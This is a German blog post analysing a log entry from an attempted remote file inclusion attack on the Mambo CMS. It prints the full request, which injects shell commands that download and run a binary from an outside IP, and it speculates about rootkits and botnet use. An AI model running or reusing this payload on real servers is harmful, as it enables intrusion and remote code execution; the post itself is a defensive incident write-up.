71grad

Der Beitrag könnte mit einem Augenzwinkern auch zu den Tipps fürs Leben gehören — wobei bislang alle Tipps wenig zur Lebensverbesserung beitragen. Sollen sie auch gar nicht.

Zum Thema: Wenn man sich bei einem größeren Anbieter einen Server mietet, muss man davon ausgehen, dass es nicht lange dauert, bis Script-Kiddies ihr Unwesen treiben. Dass Server hinter bekannten Internet-Adressen häufiger Ziel als kleine Blogs sind, war mir schon klar. Erschreckend ist allerdings, dass einfach in IP-Bereichen wie blöd irgendwelche Exploits probiert werden, in der Hoffnung irgendwie durch zu kommen.

Die folgende Zeile habe ich im Log gefunden:

/* Hinweis: Zur besseren Übersicht und aus ästhetischen Gründen (das Layout!) den Einzeiler nach jedem & umgebrochen */

/index.php?option=com_content
&do_pdf=1&
id=1index2.php?_REQUEST[option]=com_content
&_REQUEST[Itemid]=1
&GLOBALS=
&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?
&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;
./giculo;echo%20YYY;echo|

Da sollte folgendes passieren: Im Content Management System Mambo gibt es eine Funktion zum Import einer Konfigurationsdatei, die mit vollem Pfad in der URL übergeben werden muss. Als vermeintliche Konfigurationsdatei ist der Pfad zu einem manipulierten GIF-Bild angegeben, das beim Öffnen beliebigen Code auf dem Zielsystem ausführt, wie es so schön heißt. Dieser beliebige Code wird mit dem Pfad zum GIF übergeben und kann dadurch vom Exploit-Nutzer angepasst werden. In diesem Fall würden die Befehle cd /tmp, wget 209.123.16.34/giculo, chmod 744 giculo, ./giculo, echo YYY und echo | ausgeführt. Die Folgen sind an dieser Stelle nicht abzusehen, weil zuerst ein Script mit dem Namen giculo heruntergeladen und ausgeführt wird. Danach werden YYY und | ausgegeben. Leider funktionierte der Server nicht, von dem das kleine Programm heruntergeladen werden soll — ich hätte mir es gerne angesehen. Es haben zwar mehrere Leute versucht, sich auf diese Weise Zugriff zu verschaffen, aber keine der immer unterschiedlichen Adressen funktionierte.

Eine kurze Suche bei Google hat ergeben, dass es für Mambo ein Exploit gibt, das die Möglichkeit zur Ausführung von Befehlen über die Konfigurationsdatei überprüft. In diesem Zusammenhang könnte das YYY für Yes! Yes! Yes! stehen und den Erfolg der Aktion verkünden. Allerdings wollte ich nicht stundenlang herumrecherchieren und mich durch Untergrundseiten klicken, sondern habe nur kurz den Exploit auf meiner lokalen Entwicklungsmaschine¹ getestet und den Eintrag im Log begutachtet: Er ist dort wesentlich kürzer, wobei der Exploit auch nur die Möglichkeit überprüft und noch keinen direkten Schaden anrichtet. Es ließe sich mit Sicherheit ein weiterentwickeltes PHP-Script finden, dass bereits Schadroutinen enthält, damit die Script-Kiddies sich nicht erst mit Unix-Befehlen beschäftigen müssen und gleich loslegen können.

Vorstellbar ist die Installation eines Rootkit auf dem Zielsystem, durch das man möglichst unentdeckt Zugriff auf den Server bekommt und ihn für Distributed Denial of Service-Angriffe (DDoS) oder die Umwandlung zur Spamschleuder nutzen kann.

Das wird aber alles nichts, wenn…

• man wie blöd irgendwelche Adressbereiche großer Anbieter durchprobiert, weil man in den seltensten Fällen über die IP-Adresse zur Webpräsenz mit dem CMS kommt, sondern (wie bei mir) eine leere Seite sieht
• man eine nicht funktionierende Adresse für das manipulierte GIF-Bild und das Script angibt
• man danach nur tolle Dinge wie drei Ypsilons auf der Konsole ausgibt und nicht zur Absicherung noch eine andere Methode ausprobiert

Script-Kiddies eben.

1. Lokale Entwicklungsmaschine klingt doch sehr viel besser und stärker nach Hochleistung und Hochverfügbarkeit als Windows-Rechner mit Apache, oder? [↩]